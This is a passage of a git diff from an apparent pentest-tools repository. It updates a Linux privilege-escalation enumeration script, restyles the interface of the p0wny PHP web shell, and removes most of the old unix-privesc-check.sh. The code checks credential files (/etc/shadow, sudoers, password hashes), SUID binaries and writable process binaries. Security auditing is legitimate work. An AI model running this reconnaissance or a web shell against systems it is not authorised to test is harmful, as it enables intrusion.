"*dockerenv*" -exec ls -la {} \;' + 'grep -i docker /proc/self/cgroup; find / $lse_find_opts -name "*dockerenv*" -exec ls -la {} \;' #check to see if current host is running docker services lse_test "ctn010" "1" \ "Is docker available?" \ - 'docker --version; docker ps -a' + 'docker --version; docker ps -a; docker images' #is user a member of the docker group lse_test "ctn020" "0" \ 
@@ -1069,30 +1255,97 @@ lse_run_tests_containers() { #is user a member of any lxd/lxc group lse_test "ctn210" "0" \ "Is the user a member of any lxc/lxd group?" \ - 'groups | grep "lxc\|lxd"' + 'groups | grep $lse_grep_opts "lxc\|lxd"' +} + + +####################################################################( processes +lse_run_tests_processes() { + lse_header "pro" "processes" + + #wait for the process monitor to finish gathering data + lse_test "pro000" "2" \ + "Waiting for the process monitor to finish" \ + 'while [ ! -s "$lse_procmon_data" ]; do sleep 1; done; cat "$lse_procmon_data"'\ + "" \ + "lse_procs" + + #look for the paths of the process binaries + lse_test "pro001" "2" \ + "Retrieving process binaries" \ + 'printf "%s" "$lse_procs" | cut -d" " -f5 | sort -u | xargs -r which' \ + "pro000" \ + 'lse_proc_bin' + + #look for the users running the + lse_test "pro002" "2" \ + "Retrieving process users" \ + 'printf "%s" "$lse_procs" | cut -d" " -f4 | sort -u' \ + "pro000" \ + 'lse_proc_users' + + #check if we have write permissions in any process binary + lse_test "pro010" "0" \ + "Can we write in any process binary?" 
\ + 'for b in $lse_proc_bin; do [ -w "$b" ] && echo $b; done'\ + "pro001" + + #list processes running as root + lse_test "pro020" "1" \ + "Processes running with root permissions" \ + 'printf "%s" "$lse_procs" | grep -E "^[^ ]+ [^ ]+ [^ ]+ root" | lse_proc_print' \ + "pro000" + + #list processes running as users with shell + lse_test "pro030" "1" \ + "Processes running by non-root users with shell" \ + 'for user in `printf "%s\n" "$lse_shell_users" | cut -d: -f1 | grep -v root`; do printf "%s" "$lse_proc_users" | grep -qE "(^| )$user( |\$)" && printf "\n\n------ $user ------\n\n\n" && printf "%s" "$lse_procs" | grep -E "^[^ ]+ [^ ]+ [^ ]+ $user" | lse_proc_print; done' \ + "usr030 pro000 pro002" + + #running processes + lse_test "pro500" "2" \ + "Running processes" \ + 'printf "%s\n" "$lse_procs" | lse_proc_print' \ + "pro000" + + #list running process binaries and their permissions + lse_test "pro510" "2" \ + "Running process binaries and permissions" \ + 'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \ + "pro001" } # ##) #( Main -while getopts "hcil:s:" option; do +while getopts "hcCil:e:p:s:S" option; do case "${option}" in - c) lse_color=false;; + c) lse_color=false; lse_grep_opts='--color=never';; + C) lse_alt_color=true;; + e) lse_exclude_paths "${OPTARG}";; i) lse_interactive=false;; l) lse_set_level "${OPTARG}";; - s) lse_selection="${OPTARG//,/ }";; + s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; + p) lse_proc_time="${OPTARG}";; + S) lse_serve; exit $?;; h) lse_help; exit 0;; *) lse_help; exit 1;; esac done #trap to exec on SIGINT -trap "lse_exit 1" SIGINT +trap "lse_exit 1" 2 + +# use alternative color scheme +$lse_alt_color && lse_recolor lse_request_information lse_show_info PATH="$PATH:/sbin:/usr/sbin" #fix path just in case +lse_procmon & +(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & + lse_run_tests_users lse_run_tests_sudo lse_run_tests_filesystem 
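Review bot: pro000 waits with `while [ ! -s "$lse_procmon_data" ]; do sleep 1; done` and has no upper bound, so if the monitor never produces output — `ps -ewwwo start_time,pid,user:50,args` unsupported on the host, or the lock file absent when `lse_procmon` starts so its loop exits at once and writes an empty file — the whole run hangs at the processes section. A wait bounded by `$lse_proc_time` plus a margin, e.g. `i=0; while [ ! -s "$lse_procmon_data" ] && [ "$i" -lt $((lse_proc_time + 30)) ]; do sleep 1; i=$((i+1)); done; cat "$lse_procmon_data"`, keeps the script finishing. Where `$lse_procmon_lock` is created is outside this hunk, so I cannot confirm it exists before `lse_procmon &` runs. In pro020 the pattern `"^[^ ]+ [^ ]+ [^ ]+ root"` has no terminator, so user names beginning with `root` also match; `"^[^ ]+ [^ ]+ [^ ]+ root "` (trailing space, since args always follow) or the `( |\$)` form pro030 uses fixes it.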
@@ -1101,9 +1354,9 @@ lse_run_tests_security lse_run_tests_recurrent_tasks lse_run_tests_network lse_run_tests_services -lse_run_tests_processes lse_run_tests_software lse_run_tests_containers +lse_run_tests_processes lse_exit 0 #) diff --git a/p0wny-shell.php b/p0wny-shell.php index 8d395bf..f8f41c3 100644 --- a/p0wny-shell.php +++ b/p0wny-shell.php @@ -119,6 +119,22 @@ if (isset($_GET["feature"])) { font-family: monospace; } + *::-webkit-scrollbar-track { + border-radius: 8px; + background-color: #353535; + } + + *::-webkit-scrollbar { + width: 8px; + height: 8px; + } + + *::-webkit-scrollbar-thumb { + border-radius: 8px; + -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3); + background-color: #bcbcbc; + } + #shell { background: #222; max-width: 800px; @@ -146,7 +162,8 @@ if (isset($_GET["feature"])) { @media (max-width: 991px) { #shell-logo { - display: none; + font-size: 6px; + margin: -25px 0; } html, body, #shell { @@ -166,6 +183,12 @@ if (isset($_GET["feature"])) { } } + @media (max-width: 320px) { + #shell-logo { + font-size: 5px; + } + } + .shell-prompt { font-weight: bold; color: #75DF0B; @@ -231,6 +254,10 @@ if (isset($_GET["feature"])) { eShellContent.scrollTop = eShellContent.scrollHeight; } + function _defer(callback) { + setTimeout(callback, 0); + } + function featureShell(command) { _insertCommand(command); @@ -372,8 +399,10 @@ if (isset($_GET["feature"])) { if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); - eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; + _defer(function() { + eShellCmdInput.focus(); + }); } break; case "ArrowDown": 
@@ -427,6 +456,20 @@ if (isset($_GET["feature"])) { xhr.send(getQueryString()); } + document.onclick = function(event) { + event = event || window.event; + var selection = window.getSelection(); + var target = event.target || event.srcElement; + + if (target.tagName === "SELECT") { + return; + } + + if (!selection.toString()) { + eShellCmdInput.focus(); + } + }; + window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); diff --git a/unix-privesc-check.sh b/unix-privesc-check.sh index 18ef5c2..eed1fef 100755 --- a/unix-privesc-check.sh +++ b/unix-privesc-check.sh 
@@ -1,1086 +1,137 @@ #!/bin/sh -# unix-privesc-check - Checks Unix system for simple privilege escalations -# Copyright (C) 2008 pentestmonkey@pentestmonkey.net -# -# -# License -# ------- -# This tool may be used for legal purposes only. Users take full responsibility -# for any actions performed using this tool. The author accepts no liability -# for damage caused by this tool. If you do not accept these condition then -# you are prohibited from using this tool. -# -# In all other respects the GPL version 2 applies: +# $Revision$ # # This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License version 2 as -# published by the Free Software Foundation. +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # -# You should have received a copy of the GNU General Public License along -# with this program; if not, write to the Free Software Foundation, Inc., -# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # -# You are encouraged to send comments, improvements or suggestions to -# me at pentestmonkey@pentestmonkey.net -# -# -# Description -# ----------- -# Auditing tool to check for weak file permissions and other problems that -# may allow local attackers to escalate privileges. 
-# -# It is intended to be run by security auditors and pentetration testers -# against systems they have been engaged to assess, and also by system -# admnisitrators who want to check for "obvious" misconfigurations. It -# can even be run as a cron job so you can check regularly for misconfigurations -# that might be introduced. -# -# Ensure that you have the appropriate legal permission before running it -# someone else's system. -# -# TODO List -# --------- -# There's still plenty that this script doesn't do... -# - Doesn't work for shell scripts! These appear as "/bin/sh my.sh" in the process listing. -# This script only checks the perms of /bin/sh. Not what we're after. :-( -# - Similarly for perl scripts. Probably python, etc. too. -# - Check /proc/pid/cmdline for absolute path names. Check security of these (e.g. /etc/snmp/snmpd.conf) -# - Check everything in root's path - how to find root's path? -# - /proc/pid/maps, smaps are readable and lists some shared objects. We should check these. -# - /proc/pid/fd contain symlinks to all open files (but you can't see other people FDs) -# - check for trust relationships in /etc/hosts.equiv -# - NFS imports / exports / automounter -# - Insecure stuff in /etc/fstab (e.g. allowing users to mount file systems) -# - Inspecting people's PATH. tricky. maybe read from /proc/pid/environ, .bashrc, /etc/profile, .bash_profile -# - Check if /etc/init.d/* scripts are readable. Advise user to audit them if they are. -# - .exrc? -# - X11 trusts, apache passwd files, mysql trusts? -# - Daemons configured in an insecure way: tftpd, sadmind, rexd -# - World writable dirs aren't as bad if the sticky bit is set. Check for this before reporting vulns. -# - Maybe do a strings of binaries (and their .so's?) -# - Do a better job of parsing cron lines - search for full paths -# - Maybe LDPATHs from /etc/env.d -# - Check if ldd, ld.so.conf changes have broken this script on non-linux systems. -# - Avoid check certain paths e.g. 
/-/_ clearly isn't a real directory. -# - create some sort of readable report -# - indicate when it's likely a result is a false positive and when it's not. -# - Skip pseudo processes e.g. [usb-storage] -# - File permission on kernel modules -# - Replace calls to echo with a my_echo func. Should be passed a string and an "importance" value: -# - my_echo 1 "This is important and should always be printed out" -# - my_echo 2 "This is less important and should only be printed in verbose mode" -# - We check some files / dirs multiple times. Slow. Can we implement a cache? -# - grep for PRIVATE KEY to find private ssh and ssl keys. Where to grep? -# - check SGID programs +# (c) Tim Brown, 2012 +# +# / -VERSION="1.4" -HOME_DIR_FILES=".netrc .ssh/id_rsa .ssh/id_dsa .rhosts .shosts .my.cnf .ssh/authorized_keys .bash_history .sh_history .forward" -CONFIG_FILES="/etc/passwd /etc/group /etc/master.passwd /etc/inittab /etc/inetd.conf /etc/xinetd.con /etc/xinetd.d/* /etc/contab /etc/fstab /etc/profile /etc/sudoers" -PGDIRS="/usr/local/pgsql/data ~postgres/postgresql/data ~postgres/data ~pgsql/data ~pgsql/pgsql/data /var/lib/postgresql/data /etc/postgresql/8.2/main /var/lib/pgsql/data" +. lib/misc/stdio -get_owner () { - GET_OWNER_FILE=$1 - GET_OWNER_RETURN=`ls -lLd "$GET_OWNER_FILE" | awk '{print $3}'` +header () { + VERSION="2.1" + SVNVERSION="$Revision$" # Don't change this line. Auto-updated. 
+ SVNVNUM="`echo $SVNVERSION | sed \"s/[^0-9]//g\"`" + if [ -n "${SVNVNUM}" ]; then + VERSION="${VERSION}-svn-${SVNVNUM}" + fi + printf "unix-privesc-check v${VERSION} ( http://code.google.com/p/unix-privesc-check )\n\n" } -get_group () { - GET_GROUP_FILE=$1 - GET_GROUP_RETURN=`ls -lLd "$GET_GROUP_FILE" | awk '{print $4}'` +version () { + header + preamble + printf "Brought to you by:\n" + cat doc/AUTHORS + exit 1 +} + +preamble () { + printf "Shell script to check for simple privilege escalation vectors on UNIX systems.\n\n" } usage () { - echo "unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )" - echo - echo "Usage: unix-privesc-check { standard | detailed }" - echo - echo '"standard" mode: Speed-optimised check of lots of security settings.' - echo - echo '"detailed" mode: Same as standard mode, but also checks perms of open file' - echo ' handles and called files (e.g. parsed from shell scripts,' - echo ' linked .so files). This mode is slow and prone to false ' - echo ' positives but might help you find more subtle flaws in 3rd' - echo ' party programs.' - echo - echo "This script checks file permissions and other settings that could allow" - echo "local users to escalate privileges." - echo - echo "Use of this script is only permitted on systems which you have been granted" - echo "legal permission to perform a security assessment of. Apart from this " - echo "condition the GPL v2 applies." - echo - echo "Search the output for the word 'WARNING'. If you don't see it then this" - echo "script didn't find any problems." - echo -} - -banner () { - echo "Starting unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )" - echo - echo "This script checks file permissions and other settings that could allow" - echo "local users to escalate privileges." - echo - echo "Use of this script is only permitted on systems which you have been granted" - echo "legal permission to perform a security assessment of. 
Apart from this " - echo "condition the GPL v2 applies." - echo - echo "Search the output below for the word 'WARNING'. If you don't see it then" - echo "this script didn't find any problems." - echo -} - -MODE="standard" - -if [ ! "$MODE" = "standard" ] && [ ! "$MODE" = "detailed" ]; then - usage - exit 0 -fi - -# Parse any full paths from $1 (config files, progs, dirs). -# Check the permissions on each of these. -check_called_programs () { - CCP_MESSAGE_STACK=$1 - CCP_FILE=$2 - CCP_USER=$3 - CCP_PATH=$4 # optional - - # Check the perms of the supplied file regardless - # The caller doesn't want to have to call check_perms as well as check_called_programs - check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH" - - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Check if file is text or not - IS_TEXT=`file "$CCP_FILE" | grep -i text` - IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'` - - # Process shell scripts (would also work on config files that reference other files) - if [ ! -z "$IS_TEXT" ]; then - # Parse full paths from file - ignoring commented lines - CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u` - for CALLED_FILE in $CALLED_FILES; do - # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms." - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - else - # Process dynamically linked binaries - if [ ! -z "$IS_DYNBIN" ]; then - - CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^\/]*\//\//' | cut -f 1 -d ' '` - for CALLED_FILE in $CALLED_FILES; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - - # Strings binary to look for hard-coded config files - # or other programs that might be called. 
- for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - fi - fi -} - -# Parse any full paths from $1 (config files, progs, dirs). -# Check the permissions on each of these. -check_called_programs_suid () { - CCP_FILE=$1 - CCP_PATH=$2 # optional - - get_owner $CCP_FILE; CCP_USER=$GET_OWNER_RETURN - CCP_MESSAGE_STACK="$CCP_FILE is SUID $CCP_USER." - LS=`ls -l $CCP_FILE` - echo "Checking SUID-$CCP_USER program $CCP_FILE: $LS" - - # Don't check perms of executable itself - # check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH" - - # Check if file is text or not - IS_TEXT=`file "$CCP_FILE" | grep -i text` - IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'` - - # Process shell scripts (would also work on config files that reference other files) - if [ ! -z "$IS_TEXT" ]; then - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Parse full paths from file - ignoring commented lines - CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u` - for CALLED_FILE in $CALLED_FILES; do - # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms." - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - else - # Process dynamically linked binaries - if [ ! -z "$IS_DYNBIN" ]; then - - CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^\/]*\//\//' | cut -f 1 -d ' '` - for CALLED_FILE in $CALLED_FILES; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." 
"$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Strings binary to look for hard-coded config files - # or other programs that might be called. - for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - fi - fi -} - -# Check if $1 can be changed by users who are not $2 -check_perms () { - CP_MESSAGE_STACK=$1 - CHECK_PERMS_FILE=$2 - CHECK_PERMS_USER=$3 - CHECK_PERMS_PATH=$4 # optional - - if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -d "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; then - CHECK_PERMS_FOUND=0 - if [ ! -z "$CHECK_PERMS_PATH" ]; then - # Look for it in the supplied path - for DIR in `echo "$CHECK_PERMS_PATH" | sed 's/:/ /g'`; do - if [ -f "$DIR/$CHECK_PERMS_FILE" ]; then - CHECK_PERMS_FOUND=1 - CHECK_PERMS_FILE="$DIR/$CHECK_PERMS_FILE" - break - fi - done - fi - - #if [ "$CHECK_PERMS_FOUND" = "0" ]; then - # echo "ERROR: File $CHECK_PERMS_FILE doesn't exist. Checking parent path anyway." - # # return 0 - # fi - fi - - C=`echo "$CHECK_PERMS_FILE" | cut -c 1` - if [ ! "$C" = "/" ]; then - echo "ERROR: Can't find absolute path for $CHECK_PERMS_FILE. Skipping." - return 0 - fi - - echo " Checking if anyone except $CHECK_PERMS_USER can change $CHECK_PERMS_FILE" - - while [ -n "$CHECK_PERMS_FILE" ]; do - perms_secure "$CP_MESSAGE_STACK" $CHECK_PERMS_FILE $CHECK_PERMS_USER - CHECK_PERMS_FILE=`echo $CHECK_PERMS_FILE | sed 's/\/[^\/]*$//'` - done -} - -# Check if $1 can be read by users who are not $2 -check_read_perms () { - CP_MESSAGE_STACK=$1 - CHECK_PERMS_FILE=$2 - CHECK_PERMS_USER=$3 - - if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! 
-b "$CHECK_PERMS_FILE" ]; then - echo "ERROR: File $CHECK_PERMS_FILE doesn't exist" - return 0 - fi - - echo " Checking if anyone except $CHECK_PERMS_USER can read file $CHECK_PERMS_FILE" - - perms_secure_read "$CP_MESSAGE_STACK" "$CHECK_PERMS_FILE" "$CHECK_PERMS_USER" -} - -perms_secure_read () { - PS_MESSAGE_STACK=$1 - PERMS_SECURE_FILE=$2 - PERMS_SECURE_USER=$3 - - if [ ! -b "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -d "$PERMS_SECURE_FILE" ]; then - echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping." - return 0 - fi - - # Check if owner is different (but ignore root ownership, that's OK) - only_user_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check group read perm (but ignore root group, that's OK) - group_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check world read perm - world_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE -} - -perms_secure () { - PS_MESSAGE_STACK=$1 - PERMS_SECURE_FILE=$2 - PERMS_SECURE_USER=$3 - - if [ ! -d "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -b "$PERMS_SECURE_FILE" ]; then - # echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping." - return 0 - fi - - # Check if owner is different (but ignore root ownership, that's OK) - only_user_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check group write perm (but ignore root group, that's OK) - group_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check world write perm - world_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE -} - -only_user_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - # We just need to check the owner really as the owner - # can always grant themselves write access - get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN - if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! 
"$O_FILE_USER" = "root" ]; then - echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can write to $O_FILE" - fi -} - -group_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 # ignore group write access $3 is only member of group - - get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN - P=`ls -lLd $O_FILE | cut -c 6` - if [ "$P" = "w" ] && [ ! "$O_GROUP" = "root" ]; then - # check the group actually has some members other than $O_USER - group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0 - if [ "$OTHER_MEMBERS" = "1" ]; then - echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can write to $O_FILE" - fi - fi -} - -group_has_other_members () { - G_GROUP=$1 - G_USER=$2 - - # If LDAP/NIS is being used this script can't check group memberships - # we therefore assume the worst. - if [ "$EXT_AUTH" = 1 ]; then - OTHER_MEMBERS=1 - return 1 - fi - - GROUP_LINE=`grep "^$G_GROUP:" /etc/group` - MEMBERS=`echo "$GROUP_LINE" | cut -f 4 -d : | sed 's/,/ /g'` - - GID=`echo "$GROUP_LINE" | cut -f 3 -d :` - EXTRA_MEMBERS=`grep "^[^:]*:[^:]*:[0-9]*:$GID:" /etc/passwd | cut -f 1 -d : | xargs echo` - - for M in $MEMBERS; do - if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; then - OTHER_MEMBERS=1 - return 1 - fi - done - - for M in $EXTRA_MEMBERS; do - if [ ! "$M" = "$G_USER" ] && [ ! 
"$M" = "root" ]; then - OTHER_MEMBERS=1 - return 1 - fi - done - - OTHER_MEMBERS=0 - return 0 -} - -world_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - - P=`ls -lLd $O_FILE | cut -c 9` - S=`ls -lLd $O_FILE | cut -c 10` - - if [ "$P" = "w" ]; then - if [ "$S" = "t" ]; then - echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE (but sticky bit set)" - else - echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE" - fi - fi -} - -only_user_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - # We just need to check the owner really as the owner - # can always grant themselves read access - get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN - if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; then - echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can read $O_FILE" - fi -} - -group_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN - P=`ls -lLd $O_FILE | cut -c 5` - if [ "$P" = "r" ] && [ ! 
"$O_GROUP" = "root" ]; then - # check the group actually has some members other than $O_USER - group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0 - if [ "$OTHER_MEMBERS" = "1" ]; then - echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can read $O_FILE" - fi - fi -} - -world_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - - P=`ls -lLd $O_FILE | cut -c 8` - - if [ "$P" = "w" ]; then - echo "WARNING: $O_MESSAGE_STACK World read is set for $O_FILE" - fi -} - -section () { - echo - echo '############################################' - echo $1 - echo '############################################' -} - -# Guess OS -if [ -x /usr/bin/showrev ]; then - OS="solaris" - SHADOW="/etc/shadow" -elif [ -x /usr/sbin/sam -o -x /usr/bin/sam ]; then - OS="hpux" - SHADOW="/etc/shadow" -elif [ -f /etc/master.passwd ]; then - OS="bsd" - SHADOW="/etc/master.passwd" -else - OS="linux" - SHADOW="/etc/shadow" -fi -echo "Assuming the OS is: $OS" -CONFIG_FILES="$CONFIG_FILES $SHADOW" - -# Set path so we can access usual directories. HPUX and some linuxes don't have sbin in the path. -PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin; export PATH - -# Check dependent programs are installed -# Assume "which" is installed! -PROGS="ls awk grep cat mount xargs file ldd strings" -for PROG in $PROGS; do - which $PROG 2>&1 > /dev/null - if [ ! $? = "0" ]; then - echo "ERROR: Dependend program '$PROG' is mising. Can't run. Sorry!" 
- exit 1 - fi -done - -banner - -section "Recording hostname" -hostname - -section "Recording uname" -uname -a - -section "Recording Interface IP addresses" -if [ $OS = 'hpux' ]; then - for IFACE in `lanscan | grep x | awk '{print $5}' 2>/dev/null`; do - ifconfig $IFACE 2>/dev/null - done -else - ifconfig -a -fi - -section "Checking if external authentication is allowed in /etc/passwd" -FLAG=`grep '^+:' /etc/passwd` -if [ -n "$FLAG" ]; then - echo "WARNING: /etc/passwd allows external authentcation:" - grep '^+:' /etc/passwd - EXT_AUTH=1 -else - echo "No +:... line found in /etc/passwd" -fi - -section "Checking nsswitch.conf for addition authentication methods" -if [ -r "/etc/nsswitch.conf" ]; then - NIS=`grep '^passwd' /etc/nsswitch.conf | grep 'nis'` - if [ -n "$NIS" ]; then - echo "WARNING: NIS is used for authentication on this system" - EXT_AUTH=1 - fi - LDAP=`grep '^passwd' /etc/nsswitch.conf | grep 'ldap'` - if [ -n "$LDAP" ]; then - echo "WARNING: LDAP is used for authentication on this system" - EXT_AUTH=1 - fi - - if [ -z "$NIS" ] && [ -z "$LDAP" ]; then - echo "Neither LDAP nor NIS are used for authentication" - fi -else - echo "ERROR: File /etc/nsswitch.conf isn't readable. Skipping checks." -fi - -# Check important config files aren't writable -section "Checking for writable config files" -for FILE in $CONFIG_FILES; do - if [ -f "$FILE" ]; then - check_perms "$FILE is a critical config file." 
"$FILE" root - fi -done - -section "Checking if $SHADOW is readable" -check_read_perms "/etc/shadow holds authentication data" $SHADOW root - -section "Checking for password hashes in /etc/passwd" -FLAG=`grep -v '^[^:]*:[x\*]*:' /etc/passwd | grep -v '^#'` -if [ -n "$FLAG" ]; then - echo "WARNING: There seem to be some password hashes in /etc/passwd" - grep -v '^[^:]*:[x\*]*:' /etc/passwd | grep -v '^#' - EXT_AUTH=1 -else - echo "No password hashes found in /etc/passwd" -fi - -section "Checking account settings" -# Check for something nasty like r00t::0:0::/:/bin/sh in /etc/passwd -# We only need read access to /etc/passwd to be able to check this. -if [ -r "/etc/passwd" ]; then - OPEN=`grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"` - if [ -n "$OPEN" ]; then - echo "WARNING: The following accounts have no password:" - grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":" - fi -fi -if [ -r "$SHADOW" ]; then - echo "Checking for accounts with no passwords" - if [ "$OS" = "linux" ]; then - passwd -S -a | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - STATUS=`echo "$LINE" | awk '{print $2}'` - if [ "$STATUS" = "NP" ]; then - echo "WARNING: User $USER doesn't have a password" - fi - done - elif [ "$OS" = "solaris" ]; then - passwd -s -a | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - STATUS=`echo "$LINE" | awk '{print $2}'` - if [ "$STATUS" = "NP" ]; then - echo "WARNING: User $USER doesn't have a password" - fi - done - fi -else - echo "File $SHADOW isn't readable. Skipping some checks." -fi - -section "Checking library directories from /etc/ld.so.conf" -if [ -f "/etc/ld.so.conf" ] && [ -r "/etc/ld.so.conf" ]; then - for DIR in `grep '^/' /etc/ld.so.conf`; do - check_perms "$DIR is in /etc/ld.so.conf." $DIR root - done - - #FILES=`grep '^include' /etc/ld.so.conf | sed 's/^include *//'` - #if [ ! -z "$FILES" ]; then - # for DIR in `echo $FILES | xargs cat | sort -u`; do - # done - #fi -else - echo "File /etc/ld.so.conf not present. 
Skipping checks." -fi - -# Check sudoers if we have permission - needs root normally -section "Checking sudo configuration" -if [ -f "/etc/sudoers" ] && [ -r "/etc/sudoers" ]; then - echo ----------------- - echo "Checking if sudo is configured" - SUDO_USERS=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep -v '^[ \t]*Default' | grep =` - if [ ! -z "$SUDO_USERS" ]; then - echo "WARNING: Sudo is configured. Manually check nothing unsafe is allowed:" - grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep = | grep -v '^[ \t]*Default' - fi - - echo ----------------- - echo "Checking sudo users need a password" - SUDO_NOPASSWD=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD` - if [ ! -z "$SUDO_NOPASSWD" ]; then - echo "WARNING: Some users can use sudo without a password:" - grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD - fi -else - echo "File /etc/sudoers not present. Skipping checks." -fi - -section "Checking permissions on swap file(s)" -for SWAP in `swapon -s | grep -v '^Filename' | cut -f 1 -d ' '`; do - check_perms "$SWAP is used for swap space." $SWAP root - check_read_perms "$SWAP is used for swap space." $SWAP root -done - -section "Checking programs run from inittab" -if [ -f "/etc/inittab" ] && [ -r "/etc/inittab" ]; then - for FILE in `cat /etc/inittab | grep : | grep -v '^#' | cut -f 4 -d : | grep '/' | cut -f 1 -d ' ' | sort -u`; do - check_called_programs "$FILE is run from /etc/inittab as root." $FILE root - done -else - echo "File /etc/inittab not present. Skipping checks." 
